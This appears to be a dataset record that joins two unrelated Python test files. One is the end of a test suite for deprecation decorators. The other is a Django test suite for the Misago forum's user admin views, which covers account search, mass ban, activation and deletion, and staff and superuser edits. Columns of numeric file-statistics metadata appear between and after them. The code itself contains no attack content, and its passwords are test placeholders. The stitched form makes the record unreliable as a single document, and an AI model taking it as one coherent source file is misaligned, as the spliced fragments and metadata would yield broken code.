return arg0 + arg1 if deprecated else arg1 + arg0
# Assert function docs are properly updated.
self.assertEqual("_fn", _fn.__name__)
self.assertEqual(
"DEPRECATED FUNCTION ARGUMENTS"
"\n"
"\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
"\nInstructions for updating:"
"\n%s" % (date, instructions), _fn.__doc__)
# Assert calls without the deprecated argument log nothing.
self.assertEqual(3, _fn(1, 2))
self.assertEqual(0, mock_warning.call_count)
# Assert calls with the deprecated argument log a warning.
self.assertEqual(3, _fn(1, 2, True))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_varargs(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated_args(date, instructions, "deprecated")
def _fn(arg0, arg1, *deprecated):
return arg0 + arg1 if deprecated else arg1 + arg0
# Assert calls without the deprecated argument log nothing.
self.assertEqual(3, _fn(1, 2))
self.assertEqual(0, mock_warning.call_count)
# Assert calls with the deprecated argument log a warning.
self.assertEqual(3, _fn(1, 2, True, False))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_kwargs(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated_args(date, instructions, "deprecated")
def _fn(arg0, arg1, **deprecated):
return arg0 + arg1 if deprecated else arg1 + arg0
# Assert calls without the deprecated argument log nothing.
self.assertEqual(3, _fn(1, 2))
self.assertEqual(0, mock_warning.call_count)
# Assert calls with the deprecated argument log a warning.
self.assertEqual(3, _fn(1, 2, a=True, b=False))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_positional_and_named(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated_args(date, instructions, "d1", "d2")
def _fn(arg0, d1=None, arg1=2, d2=None):
return arg0 + arg1 if d1 else arg1 + arg0 if d2 else arg0 * arg1
# Assert calls without the deprecated arguments log nothing.
self.assertEqual(2, _fn(1, arg1=2))
self.assertEqual(0, mock_warning.call_count)
# Assert calls with the deprecated arguments log warnings.
self.assertEqual(2, _fn(1, None, 2, d2=False))
self.assertEqual(2, mock_warning.call_count)
(args1, _) = mock_warning.call_args_list[0]
self.assertRegexpMatches(args1[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions, "d1"]), set(args1[1:]))
(args2, _) = mock_warning.call_args_list[1]
self.assertRegexpMatches(args1[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions, "d2"]), set(args2[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_positional_and_named_with_ok_vals(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated_args(date, instructions, ("d1", None),
("d2", "my_ok_val"))
def _fn(arg0, d1=None, arg1=2, d2=None):
return arg0 + arg1 if d1 else arg1 + arg0 if d2 else arg0 * arg1
# Assert calls without the deprecated arguments log nothing.
self.assertEqual(2, _fn(1, arg1=2))
self.assertEqual(0, mock_warning.call_count)
# Assert calls with the deprecated arguments log warnings.
self.assertEqual(2, _fn(1, False, 2, d2=False))
self.assertEqual(2, mock_warning.call_count)
(args1, _) = mock_warning.call_args_list[0]
self.assertRegexpMatches(args1[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions, "d1"]), set(args1[1:]))
(args2, _) = mock_warning.call_args_list[1]
self.assertRegexpMatches(args1[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions, "d2"]), set(args2[1:]))
# Assert calls with the deprecated arguments dont log warnings if
# the value matches the 'ok_val'.
mock_warning.reset_mock()
self.assertEqual(3, _fn(1, None, 2, d2="my_ok_val"))
self.assertEqual(0, mock_warning.call_count)
class DeprecatedArgValuesTest(test.TestCase):
def _assert_subset(self, expected_subset, actual_set):
self.assertTrue(
actual_set.issuperset(expected_subset),
msg="%s is not a superset of %s." % (actual_set, expected_subset))
def test_deprecated_illegal_args(self):
instructions = "This is how you update..."
with self.assertRaisesRegexp(ValueError, "date"):
deprecation.deprecated_arg_values(None, instructions, deprecated=True)
with self.assertRaisesRegexp(ValueError, "date"):
deprecation.deprecated_arg_values("", instructions, deprecated=True)
with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"):
deprecation.deprecated_arg_values(
"07-04-2016", instructions, deprecated=True)
date = "2016-07-04"
with self.assertRaisesRegexp(ValueError, "instructions"):
deprecation.deprecated_arg_values(date, None, deprecated=True)
with self.assertRaisesRegexp(ValueError, "instructions"):
deprecation.deprecated_arg_values(date, "", deprecated=True)
with self.assertRaisesRegexp(ValueError, "argument", deprecated=True):
deprecation.deprecated_arg_values(date, instructions)
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_with_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated_arg_values(date, instructions, deprecated=True)
def _fn(arg0, arg1, deprecated=True):
"""fn doc.
Args:
arg0: Arg 0.
arg1: Arg 1.
deprecated: Deprecated!
Returns:
Sum of args.
"""
return arg0 + arg1 if deprecated else arg1 + arg0
# Assert function docs are properly updated.
self.assertEqual("_fn", _fn.__name__)
self.assertEqual(
"fn doc. (deprecated arguments)"
"\n"
"\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
"\nInstructions for updating:\n%s"
"\n"
"\nArgs:"
"\n arg0: Arg 0."
"\n arg1: Arg 1."
"\n deprecated: Deprecated!"
"\n"
"\nReturns:"
"\n Sum of args." % (date, instructions), _fn.__doc__)
# Assert calling new fn with non-deprecated value logs nothing.
self.assertEqual(3, _fn(1, 2, deprecated=False))
self.assertEqual(0, mock_warning.call_count)
# Assert calling new fn with deprecated value issues log warning.
self.assertEqual(3, _fn(1, 2, deprecated=True))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
# Assert calling new fn with default deprecated value issues log warning.
self.assertEqual(3, _fn(1, 2))
self.assertEqual(2, mock_warning.call_count)
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_with_one_line_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated_arg_values(date, instructions, deprecated=True)
def _fn(arg0, arg1, deprecated=True):
"""fn doc."""
return arg0 + arg1 if deprecated else arg1 + arg0
# Assert function docs are properly updated.
self.assertEqual("_fn", _fn.__name__)
self.assertEqual(
"fn doc. (deprecated arguments)"
"\n"
"\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
"\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__)
# Assert calling new fn with non-deprecated value logs nothing.
self.assertEqual(3, _fn(1, 2, deprecated=False))
self.assertEqual(0, mock_warning.call_count)
# Assert calling new fn with deprecated value issues log warning.
self.assertEqual(3, _fn(1, 2, deprecated=True))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
# Assert calling new fn with default deprecated value issues log warning.
self.assertEqual(3, _fn(1, 2))
self.assertEqual(2, mock_warning.call_count)
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_no_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated_arg_values(date, instructions, deprecated=True)
def _fn(arg0, arg1, deprecated=True):
return arg0 + arg1 if deprecated else arg1 + arg0
# Assert function docs are properly updated.
self.assertEqual("_fn", _fn.__name__)
self.assertEqual(
"DEPRECATED FUNCTION ARGUMENTS"
"\n"
"\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
"\nInstructions for updating:"
"\n%s" % (date, instructions), _fn.__doc__)
# Assert calling new fn with non-deprecated value logs nothing.
self.assertEqual(3, _fn(1, 2, deprecated=False))
self.assertEqual(0, mock_warning.call_count)
# Assert calling new fn issues log warning.
self.assertEqual(3, _fn(1, 2, deprecated=True))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
# Assert calling new fn with default deprecated value issues log warning.
self.assertEqual(3, _fn(1, 2))
self.assertEqual(2, mock_warning.call_count)
class DeprecationArgumentsTest(test.TestCase):
def testDeprecatedArgumentLookup(self):
good_value = 3
self.assertEqual(
deprecation.deprecated_argument_lookup("val_new", good_value, "val_old",
None), good_value)
self.assertEqual(
deprecation.deprecated_argument_lookup("val_new", None, "val_old",
good_value), good_value)
with self.assertRaisesRegexp(ValueError,
"Cannot specify both 'val_old' and 'val_new'"):
self.assertEqual(
deprecation.deprecated_argument_lookup("val_new", good_value,
"val_old", good_value),
good_value)
def testRewriteArgumentDocstring(self):
docs = """Add `a` and `b`
Args:
a: first arg
b: second arg
"""
new_docs = deprecation.rewrite_argument_docstring(
deprecation.rewrite_argument_docstring(docs, "a", "left"), "b", "right")
new_docs_ref = """Add `left` and `right`
Args:
left: first arg
right: second arg
"""
self.assertEqual(new_docs, new_docs_ref)
if __name__ == "__main__":
test.main()
| 36.792402
| 80
| 0.668019
| 3,415
| 27,116
| 5.126208
| 0.067643
| 0.077973
| 0.044556
| 0.034959
| 0.904147
| 0.882897
| 0.868902
| 0.860391
| 0.844682
| 0.822746
| 0
| 0.025418
| 0.210724
| 27,116
| 736
| 81
| 36.842391
| 0.792543
| 0.133021
| 0
| 0.813121
| 0
| 0
| 0.194456
| 0.001035
| 0
| 0
| 0
| 0
| 0.312127
| 1
| 0.107356
| false
| 0.011928
| 0.011928
| 0.021869
| 0.178926
| 0.001988
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07d7204f148c04bde45cf641df72864e42775d0b
| 27,760
|
py
|
Python
|
misago/users/tests/test_useradmin_views.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | 1
|
2017-07-25T03:04:36.000Z
|
2017-07-25T03:04:36.000Z
|
misago/users/tests/test_useradmin_views.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
misago/users/tests/test_useradmin_views.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.core import mail
from django.urls import reverse
from django.utils import six
from misago.acl.models import Role
from misago.admin.testutils import AdminTestCase
from misago.categories.models import Category
from misago.threads.testutils import post_thread, reply_thread
from misago.users.models import Ban, Rank
UserModel = get_user_model()
class UserAdminViewsTests(AdminTestCase):
AJAX_HEADER = {'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'}
def test_link_registered(self):
"""admin index view contains users link"""
response = self.client.get(reverse('misago:admin:index'))
self.assertContains(response, reverse('misago:admin:users:accounts:index'))
def test_list_view(self):
"""users list view returns 200"""
response = self.client.get(reverse('misago:admin:users:accounts:index'))
self.assertEqual(response.status_code, 302)
response = self.client.get(response['location'])
self.assertEqual(response.status_code, 200)
self.assertContains(response, self.user.username)
def test_list_search(self):
"""users list is searchable"""
response = self.client.get(reverse('misago:admin:users:accounts:index'))
self.assertEqual(response.status_code, 302)
link_base = response['location']
response = self.client.get(link_base)
self.assertEqual(response.status_code, 200)
user_a = UserModel.objects.create_user('Tyrael', 't123@test.com', 'pass123')
user_b = UserModel.objects.create_user('Tyrion', 't321@test.com', 'pass123')
user_c = UserModel.objects.create_user('Karen', 't432@test.com', 'pass123')
# Search both
response = self.client.get('%s&username=tyr' % link_base)
self.assertEqual(response.status_code, 200)
self.assertContains(response, user_a.username)
self.assertContains(response, user_b.username)
# Search tyrion
response = self.client.get('%s&username=tyrion' % link_base)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, user_a.username)
self.assertContains(response, user_b.username)
# Search tyrael
response = self.client.get('%s&email=t123@test.com' % link_base)
self.assertEqual(response.status_code, 200)
self.assertContains(response, user_a.username)
self.assertNotContains(response, user_b.username)
# Search disabled
user_c.is_active = False
user_c.save()
response = self.client.get('%s&disabled=1' % link_base)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, user_a.username)
self.assertNotContains(response, user_b.username)
self.assertContains(response, '<del>%s</del>' % user_c.username)
def test_mass_activation(self):
"""users list activates multiple users"""
user_pks = []
for i in range(10):
test_user = UserModel.objects.create_user(
'Bob%s' % i,
'bob%s@test.com' % i,
'pass123',
requires_activation=1,
)
user_pks.append(test_user.pk)
response = self.client.post(
reverse('misago:admin:users:accounts:index'),
data={
'action': 'activate',
'selected_items': user_pks,
}
)
self.assertEqual(response.status_code, 302)
inactive_qs = UserModel.objects.filter(
id__in=user_pks,
requires_activation=1,
)
self.assertEqual(inactive_qs.count(), 0)
self.assertIn("has been activated", mail.outbox[0].subject)
def test_mass_ban(self):
"""users list bans multiple users"""
user_pks = []
for i in range(10):
test_user = UserModel.objects.create_user(
'Bob%s' % i,
'bob%s@test.com' % i,
'pass123',
requires_activation=1,
)
user_pks.append(test_user.pk)
response = self.client.post(
reverse('misago:admin:users:accounts:index'),
data={
'action': 'ban',
'selected_items': user_pks,
}
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
reverse('misago:admin:users:accounts:index'),
data={
'action': 'ban',
'selected_items': user_pks,
'ban_type': ['usernames', 'emails', 'domains', 'ip', 'ip_first', 'ip_two'],
'finalize': '',
},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(Ban.objects.count(), 24)
def test_mass_delete_accounts(self):
"""users list deletes users"""
user_pks = []
for i in range(10):
test_user = UserModel.objects.create_user(
'Bob%s' % i,
'bob%s@test.com' % i,
'pass123',
requires_activation=1,
)
user_pks.append(test_user.pk)
response = self.client.post(
reverse('misago:admin:users:accounts:index'),
data={
'action': 'delete_accounts',
'selected_items': user_pks,
}
)
self.assertEqual(response.status_code, 302)
self.assertEqual(UserModel.objects.count(), 1)
def test_mass_delete_all(self):
"""users list deletes users and their content"""
user_pks = []
for i in range(10):
test_user = UserModel.objects.create_user(
'Bob%s' % i,
'bob%s@test.com' % i,
'pass123',
requires_activation=1,
)
user_pks.append(test_user.pk)
response = self.client.post(
reverse('misago:admin:users:accounts:index'),
data={
'action': 'delete_accounts',
'selected_items': user_pks,
}
)
self.assertEqual(response.status_code, 302)
self.assertEqual(UserModel.objects.count(), 1)
def test_new_view(self):
"""new user view creates account"""
response = self.client.get(reverse('misago:admin:users:accounts:new'))
self.assertEqual(response.status_code, 200)
default_rank = Rank.objects.get_default()
authenticated_role = Role.objects.get(special_role='authenticated')
response = self.client.post(
reverse('misago:admin:users:accounts:new'),
data={
'username': 'Bawww',
'rank': six.text_type(default_rank.pk),
'roles': six.text_type(authenticated_role.pk),
'email': 'reg@stered.com',
'new_password': 'pass123',
'staff_level': '0',
}
)
self.assertEqual(response.status_code, 302)
UserModel.objects.get_by_username('Bawww')
test_user = UserModel.objects.get_by_email('reg@stered.com')
self.assertTrue(test_user.check_password('pass123'))
def test_new_view_password_with_whitespaces(self):
"""new user view creates account with whitespaces password"""
response = self.client.get(reverse('misago:admin:users:accounts:new'))
self.assertEqual(response.status_code, 200)
default_rank = Rank.objects.get_default()
authenticated_role = Role.objects.get(special_role='authenticated')
response = self.client.post(
reverse('misago:admin:users:accounts:new'),
data={
'username': 'Bawww',
'rank': six.text_type(default_rank.pk),
'roles': six.text_type(authenticated_role.pk),
'email': 'reg@stered.com',
'new_password': ' pass123 ',
'staff_level': '0',
}
)
self.assertEqual(response.status_code, 302)
UserModel.objects.get_by_username('Bawww')
test_user = UserModel.objects.get_by_email('reg@stered.com')
self.assertTrue(test_user.check_password(' pass123 '))
def test_edit_view(self):
"""edit user view changes account"""
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_link = reverse(
'misago:admin:users:accounts:edit', kwargs={
'pk': test_user.pk,
}
)
response = self.client.get(test_link)
self.assertEqual(response.status_code, 200)
response = self.client.post(
test_link,
data={
'username': 'Bawww',
'rank': six.text_type(test_user.rank_id),
'roles': six.text_type(test_user.roles.all()[0].pk),
'email': 'reg@stered.com',
'new_password': 'newpass123',
'staff_level': '0',
'signature': 'Hello world!',
'is_signature_locked': '1',
'is_hiding_presence': '0',
'limits_private_thread_invites_to': '0',
'signature_lock_staff_message': 'Staff message',
'signature_lock_user_message': 'User message',
'subscribe_to_started_threads': '2',
'subscribe_to_replied_threads': '2',
}
)
self.assertEqual(response.status_code, 302)
updated_user = UserModel.objects.get(pk=test_user.pk)
self.assertTrue(updated_user.check_password('newpass123'))
self.assertEqual(updated_user.username, 'Bawww')
self.assertEqual(updated_user.slug, 'bawww')
UserModel.objects.get_by_username('Bawww')
UserModel.objects.get_by_email('reg@stered.com')
def test_edit_dont_change_username(self):
"""
If username wasn't changed, don't touch user's username, slug or history
This is regression test for issue #640
"""
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_link = reverse(
'misago:admin:users:accounts:edit', kwargs={
'pk': test_user.pk,
}
)
response = self.client.get(test_link)
self.assertEqual(response.status_code, 200)
response = self.client.post(
test_link,
data={
'username': 'Bob',
'rank': six.text_type(test_user.rank_id),
'roles': six.text_type(test_user.roles.all()[0].pk),
'email': 'reg@stered.com',
'new_password': 'pass123',
'signature': 'Hello world!',
'is_signature_locked': '1',
'is_hiding_presence': '0',
'limits_private_thread_invites_to': '0',
'signature_lock_staff_message': 'Staff message',
'signature_lock_user_message': 'User message',
'subscribe_to_started_threads': '2',
'subscribe_to_replied_threads': '2',
}
)
self.assertEqual(response.status_code, 302)
updated_user = UserModel.objects.get(pk=test_user.pk)
self.assertEqual(updated_user.username, 'Bob')
self.assertEqual(updated_user.slug, 'bob')
self.assertEqual(updated_user.namechanges.count(), 0)
def test_edit_change_password_whitespaces(self):
"""edit user view changes account password to include whitespaces"""
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_link = reverse(
'misago:admin:users:accounts:edit', kwargs={
'pk': test_user.pk,
}
)
response = self.client.get(test_link)
self.assertEqual(response.status_code, 200)
response = self.client.post(
test_link,
data={
'username': 'Bawww',
'rank': six.text_type(test_user.rank_id),
'roles': six.text_type(test_user.roles.all()[0].pk),
'email': 'reg@stered.com',
'new_password': ' newpass123 ',
'staff_level': '0',
'signature': 'Hello world!',
'is_signature_locked': '1',
'is_hiding_presence': '0',
'limits_private_thread_invites_to': '0',
'signature_lock_staff_message': 'Staff message',
'signature_lock_user_message': 'User message',
'subscribe_to_started_threads': '2',
'subscribe_to_replied_threads': '2',
}
)
self.assertEqual(response.status_code, 302)
updated_user = UserModel.objects.get(pk=test_user.pk)
self.assertTrue(updated_user.check_password(' newpass123 '))
self.assertEqual(updated_user.username, 'Bawww')
self.assertEqual(updated_user.slug, 'bawww')
UserModel.objects.get_by_username('Bawww')
UserModel.objects.get_by_email('reg@stered.com')
def test_edit_make_admin(self):
"""edit user view allows super admin to make other user admin"""
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_link = reverse(
'misago:admin:users:accounts:edit', kwargs={
'pk': test_user.pk,
}
)
response = self.client.get(test_link)
self.assertContains(response, 'id="id_is_staff_1"')
self.assertContains(response, 'id="id_is_superuser_1"')
response = self.client.post(
test_link,
data={
'username': 'Bawww',
'rank': six.text_type(test_user.rank_id),
'roles': six.text_type(test_user.roles.all()[0].pk),
'email': 'reg@stered.com',
'new_password': 'pass123',
'is_staff': '1',
'is_superuser': '0',
'signature': 'Hello world!',
'is_signature_locked': '1',
'is_hiding_presence': '0',
'limits_private_thread_invites_to': '0',
'signature_lock_staff_message': 'Staff message',
'signature_lock_user_message': 'User message',
'subscribe_to_started_threads': '2',
'subscribe_to_replied_threads': '2',
}
)
self.assertEqual(response.status_code, 302)
updated_user = UserModel.objects.get(pk=test_user.pk)
self.assertTrue(updated_user.is_staff)
self.assertFalse(updated_user.is_superuser)
def test_edit_make_superadmin_admin(self):
"""edit user view allows super admin to make other user super admin"""
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_link = reverse(
'misago:admin:users:accounts:edit', kwargs={
'pk': test_user.pk,
}
)
response = self.client.get(test_link)
self.assertContains(response, 'id="id_is_staff_1"')
self.assertContains(response, 'id="id_is_superuser_1"')
response = self.client.post(
test_link,
data={
'username': 'Bawww',
'rank': six.text_type(test_user.rank_id),
'roles': six.text_type(test_user.roles.all()[0].pk),
'email': 'reg@stered.com',
'new_password': 'pass123',
'is_staff': '0',
'is_superuser': '1',
'signature': 'Hello world!',
'is_signature_locked': '1',
'is_hiding_presence': '0',
'limits_private_thread_invites_to': '0',
'signature_lock_staff_message': 'Staff message',
'signature_lock_user_message': 'User message',
'subscribe_to_started_threads': '2',
'subscribe_to_replied_threads': '2',
}
)
self.assertEqual(response.status_code, 302)
updated_user = UserModel.objects.get(pk=test_user.pk)
self.assertFalse(updated_user.is_staff)
self.assertTrue(updated_user.is_superuser)
def test_edit_denote_superadmin(self):
"""edit user view allows super admin to denote other super admin"""
test_user = UserModel.objects.create_user(
'Bob',
'bob@test.com',
'pass123',
is_staff=True,
is_superuser=True,
)
test_link = reverse(
'misago:admin:users:accounts:edit', kwargs={
'pk': test_user.pk,
}
)
response = self.client.get(test_link)
self.assertContains(response, 'id="id_is_staff_1"')
self.assertContains(response, 'id="id_is_superuser_1"')
response = self.client.post(
test_link,
data={
'username': 'Bawww',
'rank': six.text_type(test_user.rank_id),
'roles': six.text_type(test_user.roles.all()[0].pk),
'email': 'reg@stered.com',
'new_password': 'pass123',
'is_staff': '0',
'is_superuser': '0',
'signature': 'Hello world!',
'is_signature_locked': '1',
'is_hiding_presence': '0',
'limits_private_thread_invites_to': '0',
'signature_lock_staff_message': 'Staff message',
'signature_lock_user_message': 'User message',
'subscribe_to_started_threads': '2',
'subscribe_to_replied_threads': '2',
}
)
self.assertEqual(response.status_code, 302)
updated_user = UserModel.objects.get(pk=test_user.pk)
self.assertFalse(updated_user.is_staff)
self.assertFalse(updated_user.is_superuser)
def test_edit_cant_make_admin(self):
"""edit user view forbids admins from making other admins"""
self.user.is_superuser = False
self.user.save()
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_link = reverse(
'misago:admin:users:accounts:edit', kwargs={
'pk': test_user.pk,
}
)
response = self.client.get(test_link)
self.assertNotContains(response, 'id="id_is_staff_1"')
self.assertNotContains(response, 'id="id_is_superuser_1"')
response = self.client.post(
test_link,
data={
'username': 'Bawww',
'rank': six.text_type(test_user.rank_id),
'roles': six.text_type(test_user.roles.all()[0].pk),
'email': 'reg@stered.com',
'new_password': 'pass123',
'is_staff': '1',
'is_superuser': '1',
'signature': 'Hello world!',
'is_signature_locked': '1',
'is_hiding_presence': '0',
'limits_private_thread_invites_to': '0',
'signature_lock_staff_message': 'Staff message',
'signature_lock_user_message': 'User message',
'subscribe_to_started_threads': '2',
'subscribe_to_replied_threads': '2',
}
)
self.assertEqual(response.status_code, 302)
updated_user = UserModel.objects.get(pk=test_user.pk)
self.assertFalse(updated_user.is_staff)
self.assertFalse(updated_user.is_superuser)
def test_edit_disable_user(self):
"""edit user view allows admin to disable non admin"""
self.user.is_superuser = False
self.user.save()
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_link = reverse(
'misago:admin:users:accounts:edit', kwargs={
'pk': test_user.pk,
}
)
response = self.client.get(test_link)
self.assertContains(response, 'id="id_is_active_1"')
self.assertContains(response, 'id="id_is_active_staff_message"')
response = self.client.post(
test_link,
data={
'username': 'Bawww',
'rank': six.text_type(test_user.rank_id),
'roles': six.text_type(test_user.roles.all()[0].pk),
'email': 'reg@stered.com',
'new_password': 'pass123',
'is_staff': '0',
'is_superuser': '0',
'signature': 'Hello world!',
'is_signature_locked': '1',
'is_hiding_presence': '0',
'limits_private_thread_invites_to': '0',
'signature_lock_staff_message': 'Staff message',
'signature_lock_user_message': 'User message',
'subscribe_to_started_threads': '2',
'subscribe_to_replied_threads': '2',
'is_active': '0',
'is_active_staff_message': "Disabled in test!"
}
)
self.assertEqual(response.status_code, 302)
updated_user = UserModel.objects.get(pk=test_user.pk)
self.assertFalse(updated_user.is_active)
self.assertEqual(updated_user.is_active_staff_message, "Disabled in test!")
def test_edit_superuser_disable_admin(self):
"""edit user view allows admin to disable non admin"""
self.user.is_superuser = True
self.user.save()
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_user.is_staff = True
test_user.save()
test_link = reverse(
'misago:admin:users:accounts:edit', kwargs={
'pk': test_user.pk,
}
)
response = self.client.get(test_link)
self.assertContains(response, 'id="id_is_active_1"')
self.assertContains(response, 'id="id_is_active_staff_message"')
response = self.client.post(
test_link,
data={
'username': 'Bawww',
'rank': six.text_type(test_user.rank_id),
'roles': six.text_type(test_user.roles.all()[0].pk),
'email': 'reg@stered.com',
'new_password': 'pass123',
'is_staff': '1',
'is_superuser': '0',
'signature': 'Hello world!',
'is_signature_locked': '1',
'is_hiding_presence': '0',
'limits_private_thread_invites_to': '0',
'signature_lock_staff_message': 'Staff message',
'signature_lock_user_message': 'User message',
'subscribe_to_started_threads': '2',
'subscribe_to_replied_threads': '2',
'is_active': '0',
'is_active_staff_message': "Disabled in test!"
}
)
self.assertEqual(response.status_code, 302)
updated_user = UserModel.objects.get(pk=test_user.pk)
self.assertFalse(updated_user.is_active)
self.assertEqual(updated_user.is_active_staff_message, "Disabled in test!")
def test_edit_admin_cant_disable_admin(self):
"""edit user view disallows admin to disable admin"""
self.user.is_superuser = False
self.user.save()
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_user.is_staff = True
test_user.save()
test_link = reverse(
'misago:admin:users:accounts:edit', kwargs={
'pk': test_user.pk,
}
)
response = self.client.get(test_link)
self.assertNotContains(response, 'id="id_is_active_1"')
self.assertNotContains(response, 'id="id_is_active_staff_message"')
response = self.client.post(
test_link,
data={
'username': 'Bawww',
'rank': six.text_type(test_user.rank_id),
'roles': six.text_type(test_user.roles.all()[0].pk),
'email': 'reg@stered.com',
'new_password': 'pass123',
'is_staff': '1',
'is_superuser': '0',
'signature': 'Hello world!',
'is_signature_locked': '1',
'is_hiding_presence': '0',
'limits_private_thread_invites_to': '0',
'signature_lock_staff_message': 'Staff message',
'signature_lock_user_message': 'User message',
'subscribe_to_started_threads': '2',
'subscribe_to_replied_threads': '2',
'is_active': '0',
'is_active_staff_message': "Disabled in test!"
}
)
self.assertEqual(response.status_code, 302)
updated_user = UserModel.objects.get(pk=test_user.pk)
self.assertTrue(updated_user.is_active)
self.assertFalse(updated_user.is_active_staff_message)
def test_delete_threads_view(self):
"""delete user threads view deletes threads"""
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_link = reverse(
'misago:admin:users:accounts:delete-threads', kwargs={
'pk': test_user.pk,
}
)
category = Category.objects.all_categories()[:1][0]
[post_thread(category, poster=test_user) for _ in range(10)]
response = self.client.post(test_link, **self.AJAX_HEADER)
self.assertEqual(response.status_code, 200)
response_dict = response.json()
self.assertEqual(response_dict['deleted_count'], 10)
self.assertFalse(response_dict['is_completed'])
response = self.client.post(test_link, **self.AJAX_HEADER)
self.assertEqual(response.status_code, 200)
response_dict = response.json()
self.assertEqual(response_dict['deleted_count'], 0)
self.assertTrue(response_dict['is_completed'])
def test_delete_posts_view(self):
"""delete user posts view deletes posts"""
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_link = reverse(
'misago:admin:users:accounts:delete-posts', kwargs={
'pk': test_user.pk,
}
)
category = Category.objects.all_categories()[:1][0]
thread = post_thread(category)
[reply_thread(thread, poster=test_user) for _ in range(10)]
response = self.client.post(test_link, **self.AJAX_HEADER)
self.assertEqual(response.status_code, 200)
response_dict = response.json()
self.assertEqual(response_dict['deleted_count'], 10)
self.assertFalse(response_dict['is_completed'])
response = self.client.post(test_link, **self.AJAX_HEADER)
self.assertEqual(response.status_code, 200)
response_dict = response.json()
self.assertEqual(response_dict['deleted_count'], 0)
self.assertTrue(response_dict['is_completed'])
def test_delete_account_view(self):
"""delete user account view deletes user account"""
test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
test_link = reverse(
'misago:admin:users:accounts:delete-account', kwargs={
'pk': test_user.pk,
}
)
response = self.client.post(test_link, **self.AJAX_HEADER)
self.assertEqual(response.status_code, 200)
response_dict = response.json()
self.assertTrue(response_dict['is_completed'])
| 38.131868
| 91
| 0.575324
| 3,009
| 27,760
| 5.059156
| 0.07112
| 0.038889
| 0.050844
| 0.066675
| 0.869934
| 0.856599
| 0.833279
| 0.824936
| 0.81528
| 0.811207
| 0
| 0.018501
| 0.302954
| 27,760
| 727
| 92
| 38.184319
| 0.768217
| 0.039085
| 0
| 0.752525
| 0
| 0
| 0.214924
| 0.096288
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.037037
| false
| 0.063973
| 0.015152
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
